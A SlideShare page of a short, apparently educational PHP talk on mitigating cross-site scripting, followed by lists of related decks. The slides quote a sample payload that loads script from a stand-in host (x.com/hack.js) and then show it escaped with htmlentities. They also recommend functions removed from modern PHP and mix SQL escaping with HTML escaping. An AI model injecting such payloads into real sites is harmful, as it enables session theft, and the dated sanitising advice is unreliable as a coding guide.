SlideShare a Scribd company logo

Xss mitigation php [Repaired]

Download as PPTX, PDF
Tinashe Makuti
Tinashe Makuti
1 of 11
Kerdainos neos gnosis Enjoy new knowledge XSS MITIGATION IN PHP KERDAINO NEOS GNOSIS
Kerdainos neos gnosis Enjoy new knowledge Tinashe Makuti Developer @Base2Theory C,C++, PHP, VISUAL BASIC.NET WEBSITE: www.educattem.com Email. mtinashe@educattem.com
Contents • WHAT IS XSS. • DANGERS OF NOT MITIGATING IT. • PHP’S HELP IN STOPPING DEADLY XSS (htmlentities) • htmlspecialchars(), get_magic_quotes_gpc(), stripslashes(), mysql_real_escape_string() • Setting Httponly attribute in PHP so to avoid client access to protected cookies
What is xss Defined earlier on. • But never the less Cross Site Scripting(xss) is the event when an attacker injects a script, often JavaScript, into the output of a web application in such a way that it is executed in the client browser.
DANGERS OF NOT TAKING ACTION AGAINST IT. Cookies will be stolen. • Stolen cookies helps the attacker to know your client’s username and password. • The attacker can deploy a Trojan on your user’s computer. • The attacker like you can steal money from the bank, like you are going to do today.
So what does uncle PHP say about this naughty boy XSS PHP offers us with a wide range of purifier functions namely: i. Htmlentities ii. htmlspecialchars(), iii.get_magic_quotes_gpc(), iv.stripslashes(), v. mysql_real_escape_string() Use of these is seen in the next slide as they are used together to sanitize some vulnerable code.
Some dangerous code <script src='http://x.com/hack.js'> </script><script>hack();</script> Our purpose is to neutralize this code. • If let to run this code will load in a JavaScript program and then executes malicious functions. • But this is not much of a threat if we apply the htmlentities sanitizer.
Some dangerous code htmlentities(<script src='http://x.com/hack.js'></script>) htmlentities(<script>hack();</script>) Neutralized. • If let to run this code it will turn into a harmless string below &lt;script src='http://x.com/hack.js'&gt; &lt;/script&gt;&lt;script&gt;hack();&lt;/scrip t&gt; • Good thing about this is that this is harmless to our client’s machine.
Another example: Uncle PHP at work <?php function mysql_entities_fix_string($string) { return htmlentities(mysql_fix_string($string)); } function mysql_fix_string($string) { If (get_magic_quotes_gpc()) $string = stripslashes($string); return mysql_real_escape_string($string); } ?> The mysql_entities_fix_string function first calls mysql_fix_string and then passes the result through htmlentities before returning the fully sanitized string.
Finally restricting access to our cookies using HttpOnly HttpOnly allows mitigating the risk of a client side script accessing our protected cookies. • But however this will only work if the selected browser is compatible with the httponly attribute.
Using PHP to set HttpOnly PHP supports setting of the HttpOnly flag from version 5.0.2 Thus session cookies managed by PHP, the flag can be set permanently in the php.ini file i.e session.cookie_httponly = True

Recommended

Tsc summit #2 - HTTP Header Security
Tsc summit #2 - HTTP Header SecurityTsc summit #2 - HTTP Header Security
Tsc summit #2 - HTTP Header SecurityMikal Villa
 
Web security at Meteor (Pivotal Labs)
Web security at Meteor (Pivotal Labs)Web security at Meteor (Pivotal Labs)
Web security at Meteor (Pivotal Labs)Emily Stark
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyRyan LaBouve
 
Meteor Meets Mallory
Meteor Meets MalloryMeteor Meets Mallory
Meteor Meets MalloryEmily Stark
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
An Overview of Common Vulnerabilities in Wordpress
An Overview of Common Vulnerabilities in WordpressAn Overview of Common Vulnerabilities in Wordpress
An Overview of Common Vulnerabilities in WordpressAnalytive
 
Node.JS security
Node.JS securityNode.JS security
Node.JS securityDeepu S Nath
 

Recommended

Tsc summit #2 - HTTP Header Security
Tsc summit #2 - HTTP Header SecurityTsc summit #2 - HTTP Header Security
Tsc summit #2 - HTTP Header SecurityMikal Villa
 
Web security at Meteor (Pivotal Labs)
Web security at Meteor (Pivotal Labs)Web security at Meteor (Pivotal Labs)
Web security at Meteor (Pivotal Labs)Emily Stark
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyRyan LaBouve
 
Meteor Meets Mallory
Meteor Meets MalloryMeteor Meets Mallory
Meteor Meets MalloryEmily Stark
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
An Overview of Common Vulnerabilities in Wordpress
An Overview of Common Vulnerabilities in WordpressAn Overview of Common Vulnerabilities in Wordpress
An Overview of Common Vulnerabilities in WordpressAnalytive
 
Node.JS security
Node.JS securityNode.JS security
Node.JS securityDeepu S Nath
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Francois Marier
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeScott Helme
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER
5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER
5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVEREpicHosts UK
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Francois Marier
 
Lets exploit Injection and XSS
Lets exploit Injection and XSSLets exploit Injection and XSS
Lets exploit Injection and XSSlethalduck
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Cqcon2015
Cqcon2015Cqcon2015
Cqcon2015Antonio Sanso
 
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...PROIDEA
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Francois Marier
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck
 
Cryptography In The Browser Using JavaScript
Cryptography In The Browser Using JavaScriptCryptography In The Browser Using JavaScript
Cryptography In The Browser Using JavaScriptbarysteyn
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton
 
Ssl certificate in internet world
Ssl certificate in internet worldSsl certificate in internet world
Ssl certificate in internet worldjamesbarns729
 
URL to HTML
URL to HTMLURL to HTML
URL to HTMLFrancois Marier
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get StungBarry Dorrans
 
W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security PolicyMarkus Wichmann
 
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control planeMicrosoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control planeTom Janetscheck
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician Antonio Sanso
 
Area de talleres filu2015 imp
Area de talleres filu2015 impArea de talleres filu2015 imp
Area de talleres filu2015 impRuth Ma. Barragán Uscanga
 
Manifiesto 8 de marzo 2016
Manifiesto 8 de marzo 2016Manifiesto 8 de marzo 2016
Manifiesto 8 de marzo 2016Vicente Cuesta Moya
 

More Related Content

What's hot

Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Francois Marier
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeScott Helme
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER
5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER
5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVEREpicHosts UK
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Francois Marier
 
Lets exploit Injection and XSS
Lets exploit Injection and XSSLets exploit Injection and XSS
Lets exploit Injection and XSSlethalduck
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...PROIDEA
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Francois Marier
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck
 
Cryptography In The Browser Using JavaScript
Cryptography In The Browser Using JavaScriptCryptography In The Browser Using JavaScript
Cryptography In The Browser Using JavaScriptbarysteyn
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton
 
Ssl certificate in internet world
Ssl certificate in internet worldSsl certificate in internet world
Ssl certificate in internet worldjamesbarns729
 
W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security PolicyMarkus Wichmann
 
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control planeMicrosoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control planeTom Janetscheck
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician Antonio Sanso
 

What's hot (20)

Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army Knife
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
 
5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER
5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER
5 TIPS TO SECURE YOUR VPS AND DEDICATED SERVER
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
 
Lets exploit Injection and XSS
Lets exploit Injection and XSSLets exploit Injection and XSS
Lets exploit Injection and XSS
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Cqcon2015
Cqcon2015Cqcon2015
Cqcon2015
 
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS Application
 
Cryptography In The Browser Using JavaScript
Cryptography In The Browser Using JavaScriptCryptography In The Browser Using JavaScript
Cryptography In The Browser Using JavaScript
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
 
Ssl certificate in internet world
Ssl certificate in internet worldSsl certificate in internet world
Ssl certificate in internet world
 
URL to HTML
URL to HTMLURL to HTML
URL to HTML
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get Stung
 
W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security Policy
 
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control planeMicrosoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician
 

Viewers also liked

Month Of Rabi-Ul-Awwal
Month Of Rabi-Ul-Awwal Month Of Rabi-Ul-Awwal
Month Of Rabi-Ul-Awwal Ahmed@3604
 
XoXo Accesorios
XoXo AccesoriosXoXo Accesorios
XoXo AccesoriosLaurah0903
 
ISLAMI ZINDAGI_اسلامی ذندگی
ISLAMI ZINDAGI_اسلامی ذندگی ISLAMI ZINDAGI_اسلامی ذندگی
ISLAMI ZINDAGI_اسلامی ذندگی Ahmed@3604
 
Book - Faizan e Data Ganj Bakhsh
Book - Faizan e Data Ganj BakhshBook - Faizan e Data Ganj Bakhsh
Book - Faizan e Data Ganj Bakhshdawateislami
 
Mayple html5 player
Mayple html5 playerMayple html5 player
Mayple html5 player재동 이
 
Tamheed ul eman.urdu part 1
Tamheed ul eman.urdu part 1Tamheed ul eman.urdu part 1
Tamheed ul eman.urdu part 1dawateislami
 
XXL2011 - Team 2 - MidTerm Presentation 17 Feb
XXL2011 - Team 2 - MidTerm Presentation 17 FebXXL2011 - Team 2 - MidTerm Presentation 17 Feb
XXL2011 - Team 2 - MidTerm Presentation 17 FebMichela Turrin
 
Aina e qiyamat.hindi
Aina e qiyamat.hindiAina e qiyamat.hindi
Aina e qiyamat.hindidawateislami
 

Viewers also liked (15)

Area de talleres filu2015 imp
Area de talleres filu2015 impArea de talleres filu2015 imp
Area de talleres filu2015 imp
 
Manifiesto 8 de marzo 2016
Manifiesto 8 de marzo 2016Manifiesto 8 de marzo 2016
Manifiesto 8 de marzo 2016
 
Month Of Rabi-Ul-Awwal
Month Of Rabi-Ul-Awwal Month Of Rabi-Ul-Awwal
Month Of Rabi-Ul-Awwal
 
XoXo Accesorios
XoXo AccesoriosXoXo Accesorios
XoXo Accesorios
 
ISLAMI ZINDAGI_اسلامی ذندگی
ISLAMI ZINDAGI_اسلامی ذندگی ISLAMI ZINDAGI_اسلامی ذندگی
ISLAMI ZINDAGI_اسلامی ذندگی
 
Book - Faizan e Data Ganj Bakhsh
Book - Faizan e Data Ganj BakhshBook - Faizan e Data Ganj Bakhsh
Book - Faizan e Data Ganj Bakhsh
 
Mayple html5 player
Mayple html5 playerMayple html5 player
Mayple html5 player
 
Tamheed ul eman.urdu part 1
Tamheed ul eman.urdu part 1Tamheed ul eman.urdu part 1
Tamheed ul eman.urdu part 1
 
XXL2011 - Team 2 - MidTerm Presentation 17 Feb
XXL2011 - Team 2 - MidTerm Presentation 17 FebXXL2011 - Team 2 - MidTerm Presentation 17 Feb
XXL2011 - Team 2 - MidTerm Presentation 17 Feb
 
Cure For Sins
Cure For SinsCure For Sins
Cure For Sins
 
Aina e qiyamat.hindi
Aina e qiyamat.hindiAina e qiyamat.hindi
Aina e qiyamat.hindi
 
Logicfin adquisciones
Logicfin adquiscionesLogicfin adquisciones
Logicfin adquisciones
 
World Hepatitis Day 2015: introduction and overview
World Hepatitis Day 2015: introduction and overviewWorld Hepatitis Day 2015: introduction and overview
World Hepatitis Day 2015: introduction and overview
 
Scientific Sessions 2015: Recurrent BV and candidiasis
Scientific Sessions 2015: Recurrent BV and candidiasisScientific Sessions 2015: Recurrent BV and candidiasis
Scientific Sessions 2015: Recurrent BV and candidiasis
 
Ketan Resume
Ketan ResumeKetan Resume
Ketan Resume
 

Similar to Xss mitigation php [Repaired]

W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)OWASP Khartoum
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
 
20160211 OWASP Charlotte RASP
20160211 OWASP Charlotte RASP20160211 OWASP Charlotte RASP
20160211 OWASP Charlotte RASPchadtindel
 
Crypto failures every developer should avoid
Crypto failures every developer should avoidCrypto failures every developer should avoid
Crypto failures every developer should avoidOwaspCzech
 
Crypto failures every developer should avoid
Crypto failures every developer should avoidCrypto failures every developer should avoid
Crypto failures every developer should avoidFilip Šebesta
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNull 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNinad Sarang
 
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad SarangNull Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarangnullowaspmumbai
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in GrailsOSOCO
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grailstheratpack
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsPriyanka Aash
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730chadtindel
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 

Similar to Xss mitigation php [Repaired] (20)

W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
20160211 OWASP Charlotte RASP
20160211 OWASP Charlotte RASP20160211 OWASP Charlotte RASP
20160211 OWASP Charlotte RASP
 
Crypto failures every developer should avoid
Crypto failures every developer should avoidCrypto failures every developer should avoid
Crypto failures every developer should avoid
 
Crypto failures every developer should avoid
Crypto failures every developer should avoidCrypto failures every developer should avoid
Crypto failures every developer should avoid
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNull 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarang
 
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad SarangNull Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grails
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grails
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grails
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documents
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
 
Open source security
Open source securityOpen source security
Open source security
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 

Xss mitigation php [Repaired]

  • 1. Kerdainos neos gnosis Enjoy new knowledge XSS MITIGATION IN PHP KERDAINO NEOS GNOSIS
  • 2. Kerdainos neos gnosis Enjoy new knowledge Tinashe Makuti Developer @Base2Theory C,C++, PHP, VISUAL BASIC.NET WEBSITE: www.educattem.com Email. mtinashe@educattem.com
  • 3. Contents • WHAT IS XSS. • DANGERS OF NOT MITIGATING IT. • PHP’S HELP IN STOPPING DEADLY XSS (htmlentities) • htmlspecialchars(), get_magic_quotes_gpc(), stripslashes(), mysql_real_escape_string() • Setting Httponly attribute in PHP so to avoid client access to protected cookies
  • 4. What is xss Defined earlier on. • But never the less Cross Site Scripting(xss) is the event when an attacker injects a script, often JavaScript, into the output of a web application in such a way that it is executed in the client browser.
  • 5. DANGERS OF NOT TAKING ACTION AGAINST IT. Cookies will be stolen. • Stolen cookies helps the attacker to know your client’s username and password. • The attacker can deploy a Trojan on your user’s computer. • The attacker like you can steal money from the bank, like you are going to do today.
  • 6. So what does uncle PHP say about this naughty boy XSS PHP offers us with a wide range of purifier functions namely: i. Htmlentities ii. htmlspecialchars(), iii.get_magic_quotes_gpc(), iv.stripslashes(), v. mysql_real_escape_string() Use of these is seen in the next slide as they are used together to sanitize some vulnerable code.
  • 7. Some dangerous code <script src='http://x.com/hack.js'> </script><script>hack();</script> Our purpose is to neutralize this code. • If let to run this code will load in a JavaScript program and then executes malicious functions. • But this is not much of a threat if we apply the htmlentities sanitizer.
  • 8. Some dangerous code htmlentities(<script src='http://x.com/hack.js'></script>) htmlentities(<script>hack();</script>) Neutralized. • If let to run this code it will turn into a harmless string below &lt;script src='http://x.com/hack.js'&gt; &lt;/script&gt;&lt;script&gt;hack();&lt;/scrip t&gt; • Good thing about this is that this is harmless to our client’s machine.
  • 9. Another example: Uncle PHP at work <?php function mysql_entities_fix_string($string) { return htmlentities(mysql_fix_string($string)); } function mysql_fix_string($string) { If (get_magic_quotes_gpc()) $string = stripslashes($string); return mysql_real_escape_string($string); } ?> The mysql_entities_fix_string function first calls mysql_fix_string and then passes the result through htmlentities before returning the fully sanitized string.
  • 10. Finally restricting access to our cookies using HttpOnly HttpOnly allows mitigating the risk of a client side script accessing our protected cookies. • But however this will only work if the selected browser is compatible with the httponly attribute.
  • 11. Using PHP to set HttpOnly PHP supports setting of the HttpOnly flag from version 5.0.2 Thus session cookies managed by PHP, the flag can be set permanently in the php.ini file i.e session.cookie_httponly = True